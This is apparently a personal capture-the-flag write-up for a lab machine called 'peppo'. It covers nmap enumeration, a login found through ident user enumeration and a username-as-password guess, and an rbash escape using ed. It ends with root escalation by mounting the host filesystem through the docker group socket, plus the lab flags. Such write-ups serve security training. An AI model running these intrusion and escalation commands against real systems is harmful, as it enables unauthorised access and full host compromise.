Enum
sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
echo "-----------------------------------------------------"
echo "TCP is done, startng udp (slowwwwww)
echo "-----------------------------------------------------"
sudo nmap -T4 -sU -A -vv -p- -o udp --min-rate 1000 $IP
Services:
Discovered open port 113/tcp on 192.168.156.60
Discovered open port 22/tcp on 192.168.156.60
Discovered open port 8080/tcp on 192.168.156.60
Discovered open port 5432/tcp on 192.168.156.60
Discovered open port 10000/tcp on 192.168.156.60
Interesting services:
113/tcp open ident FreeBSD identd
|_auth-owners: nobody
5432/tcp open postgresql PostgreSQL DB 12.3 - 12.4
8080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
Redmine on 8080
admin:admin
we in
can’t find anything here, version not vuln.
113 ident
113 - Pentesting Ident | HackTricks
ident-user-enum 192.168.156.60 22 113 10000 8080 53 5432
eleanor
Try username:username combos for auth (lmao i swear)
ssh eleanor@192.168.156.60
creds
eleanor:eleanor
no nano, vim, cat, less, more, grep, or anything
How to read local.txt?
rbash ☹️
we can escape with ed
ed
!/bin/bash
/usr/bin/vim local.txt
local
26495c8f4a09d26599c5c0b79da3ceb0
we are in docker group
eleanor@peppo:~$ /usr/bin/id
uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)
we can see the availaible docker images
./docker image ls
and priv esc
./docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it redmine chroot /mnt bash
proof
9c82051f3d6387100a9a3b25e9c27672